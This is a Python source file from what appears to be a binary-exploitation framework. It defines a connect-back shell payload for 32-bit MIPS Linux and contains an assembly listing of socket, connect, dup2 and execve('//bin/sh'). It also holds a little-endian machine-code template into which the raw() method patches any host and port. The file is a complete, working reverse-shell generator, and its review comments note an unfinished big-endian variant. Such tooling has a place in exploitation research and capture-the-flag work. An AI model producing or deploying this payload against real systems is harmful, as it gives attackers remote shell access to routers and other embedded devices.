import ipaddress
import socket
import struct

from archinfo import Endness

from ..shellcode import Shellcode
from ..utils import convert_arch

class LinuxMIPS32Connectback(Shellcode):
    """Connect-back shell payload for 32-bit MIPS Linux.

    Per the assembly listing in ``asm``, the payload opens a socket, connects
    it to a host/port, dup2()s the socket over descriptors 2, 1 and 0, and
    finally execve()s ``//bin/sh``.

    Only the little-endian encoding (``code_le``) is complete; ``raw`` raises
    ``NotImplementedError`` for big-endian targets.
    """

    # Metadata read by the surrounding framework (consumers are not visible
    # in this file).
    os = ["unix"]
    arches = ["mipsel", "mipsbe"]
    name = "connectback"

    # Reference assembly listing. It hard-codes 127.0.0.1:8080; the real
    # host/port are patched into ``code_le`` by ``raw``.
    # NOTE(review): the comment that starts "what we actually want to do"
    # ends in "/*" rather than "*/". If this text is ever fed to an assembler
    # with C-style comments, the sockaddr setup that follows would be
    # swallowed up to the next "*/" -- confirm before assembling from it.
    asm = """
/* Need IP and port to exploit */

/* open new socket */
    /* call socket(2, SOCK_STREAM (2), 0) */
    li $t9, ~2
    not $a0, $t9
    slti $a2, $zero, 0xFFFF /* $a2 = 0 */
    ori $v0, $zero, SYS_socket
    sw $a0, -4($sp) /* mov $a1, $a0 */
    lw $a1, -4($sp)
    syscall 0x40404

/* save opened socket */
    sw $v0, -4($sp) /* mov $s0, $v0 */
    lw $s0, -4($sp)

/* push sockaddr, connect() */
    /* Keeping the next line of bullshit that pwntools generates, man this is bad.
    /* push '\x00\x02\x1f\x90\x7f\x00\x00\x01' */
    /* what we actually want to do is push '\x90\x1f\x00\x02\x01\x00\x00\x7f' /*
    li $t9, ~0x901f0002
    not $t1, $t9
    sw $t1, -8($sp)
    li $t9, ~0x0100007f
    not $t1, $t9
    sw $t1, -4($sp)
    addiu $sp, $sp, -8
    /* call connect('$s0', '$sp', 0x10) */
    sw $s0, -4($sp) /* mov $a0, $s0 */
    lw $a0, -4($sp)
    add $a1, $sp, $0 /* mov $a1, $sp */
    li $t9, ~0x10
    not $a2, $t9
    ori $v0, $zero, SYS_connect
    syscall 0x40404

/* Socket that is maybe connected is in $s0 */
    sw $s0, -4($sp) /* mov $a0, $s0 */
    lw $a0, -4($sp)

/* call dup2(7,[0,1,2]) */
    li $t9, ~2
    not $a1, $t9
start:
    ori $v0, $zero, SYS_dup2
    syscall 0x40404
    addi $a1, $a1, -1
    bgez $a1, start
    add $t9, $t9, $zero /* nop */

    /* execve(path='//bin/sh', argv=['sh'], envp={}) */
    /* push '//bin/sh\x00' */
    li $t1, 0x69622f2f
    sw $t1, -12($sp)
    li $t1, 0x68732f6e
    sw $t1, -8($sp)
    sw $zero, -4($sp)
    addiu $sp, $sp, -12
    add $a0, $sp, $0 /* mov $a0, $sp */
    /* push argument array [] */
    /* push '\x00' */
    sw $zero, -4($sp)
    addiu $sp, $sp, -4
    slti $a2, $zero, 0xFFFF /* $a2 = 0 */
    sw $a2, -4($sp)
    addi $sp, $sp, -4 /* null terminate */
    add $a2, $sp, $0 /* mov $a2, $sp */
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    ori $t1, $zero, 26739
    sw $t1, -4($sp)
    addiu $sp, $sp, -4
    slti $a1, $zero, 0xFFFF /* $a1 = 0 */
    sw $a1, -4($sp)
    addi $sp, $sp, -4 /* null terminate */
    li $t9, ~4
    not $a1, $t9
    add $a1, $sp, $zero
    sw $a1, -4($sp)
    addi $sp, $sp, -4 /* 'sh\x00' */
    add $a1, $sp, $0 /* mov $a1, $sp */
    /* setregs noop */
    /* call execve() */
    ori $v0, $zero, SYS_execve
    syscall 0x40404
"""

    # Little-endian machine-code template with three two-byte "%s" slots.
    # Each slot is the 16-bit immediate of the instruction whose opcode bytes
    # follow it, so the slots must be filled in this exact order.
    code_le = (b"\xfd\xff\x19$'  \x03\xff\xff\x06(W\x10\x024\xfc\xff\xa4\xaf\xfc\xff\xa5\x8f\x0c\x01\x01\x01\xfc\xff\xa2\xaf\xfc\xff\xb0\x8f" +
               b"%s" +  # lui immediate: inverted port
               b"\x19<\xfd\xff97'H \x03\xf8\xff\xa9\xaf" +
               b"%s" +  # lui immediate: last two bytes of the inverted IP
               b"\x19<" +
               b"%s" +  # ori immediate: first two bytes of the inverted IP
               b"97'H \x03\xfc\xff\xa9\xaf\xf8\xff\xbd'\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f (\xa0\x03\xef\xff\x19$'0 \x03J\x10\x024\x0c\x01\x01\x01\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\xfd\xff\x19$'( \x03\xdf\x0f\x024\x0c\x01\x01\x01\xff\xff\xa5 \xfc\xff\xa1\x04 \xc8 \x03bi\t<//)5\xf4\xff\xa9\xafsh\t<n/)5\xf8\xff\xa9\xaf\xfc\xff\xa0\xaf\xf4\xff\xbd'  \xa0\x03\xfc\xff\xa0\xaf\xfc\xff\xbd'\xff\xff\x06(\xfc\xff\xa6\xaf\xfc\xff\xbd# 0\xa0\x03sh\t4\xfc\xff\xa9\xaf\xfc\xff\xbd'\xff\xff\x05(\xfc\xff\xa5\xaf\xfc\xff\xbd#\xfb\xff\x19$'( \x03 (\xa0\x03\xfc\xff\xa5\xaf\xfc\xff\xbd# (\xa0\x03\xab\x0f\x024\x0c\x01\x01\x01"
               )

    # Big-endian template. It has a single "%s" slot and is never used by
    # ``raw``; treat it as unfinished.
    code_be = (b"$\x19" +
               b"%s" +
               b"\x03  '$\x19\xff\xfd\x03 ('4\x02\x0f\xdf\x01\x01\x01\x0c \xa5\xff\xff\x04\xa1\xff\xfc\x03 \xc8 <\tib5)//\xaf\xa9\xff\xf4<\ths5)/n\xaf\xa9\xff\xf8\xaf\xa0\xff\xfc'\xbd\xff\xf4\x03\xa0  \xaf\xa0\xff\xfc'\xbd\xff\xfc(\x06\xff\xff\xaf\xa6\xff\xfc#\xbd\xff\xfc\x03\xa00 4\ths\xaf\xa9\xff\xfc'\xbd\xff\xfc(\x05\xff\xff\xaf\xa5\xff\xfc#\xbd\xff\xfc$\x19\xff\xfb\x03 ('\x03\xa0( \xaf\xa5\xff\xfc#\xbd\xff\xfc\x03\xa0( 4\x02\x0f\xab\x01\x01\x01\x0c")

    def __init__(self, host: str, port: int):
        """Remember where the payload should connect back to.

        Args:
            host: Host name or IPv4 address; resolved later, in ``raw``.
            port: TCP port, 0..65535 inclusive.

        Raises:
            ValueError: If ``port`` does not fit in 16 bits.
        """
        self.host = host
        self.port = port

        # 0xffff (65535) is itself a valid 16-bit port, so only values
        # strictly above it are rejected.
        if self.port < 0 or self.port > 0xffff:
            raise ValueError("invalid port specified")

    def raw(self, arch=None) -> bytes:
        """Return the machine code with the host and port patched in.

        Args:
            arch: Architecture identifier accepted by ``convert_arch``.

        Returns:
            The little-endian MIPS32 payload as ``bytes``.

        Raises:
            ValueError: If ``arch`` is missing or falsy.
            TypeError: If ``arch`` is not MIPS32.
            NotImplementedError: If ``arch`` is not little-endian.
        """
        if not arch:
            raise ValueError("Architecture must be specified.")

        the_arch = convert_arch(arch)

        if the_arch.name != "MIPS32":
            raise TypeError("%s only supports MIPS32." % str(self.__class__))

        # Reject unsupported endianness before resolving the host, so no DNS
        # lookup is made for a payload that cannot be built.
        if the_arch.memory_endness != Endness.LE:
            raise NotImplementedError(
                "%s does not support big-endian MIPS32 yet." % str(self.__class__)
            )

        # The payload loads each constant bitwise-inverted and flips it back
        # with `not` (see the `li $t9, ~X` / `not` pairs in ``asm``), so the
        # patched immediates are complemented here.
        port_imm = struct.pack('>H', ~self.port & 0xffff)

        resolved = socket.gethostbyname(self.host)
        address = int(ipaddress.ip_address(resolved))
        inverted_ip = struct.pack('>I', ~address & 0xffffffff)

        # The IP word is built by lui (upper half) then ori (lower half). On a
        # little-endian target the upper half holds the address's last two
        # bytes, so the trailing pair fills the lui slot.
        lui_imm = inverted_ip[2:]
        ori_imm = inverted_ip[:2]

        return self.code_le % (port_imm, lui_imm, ori_imm)


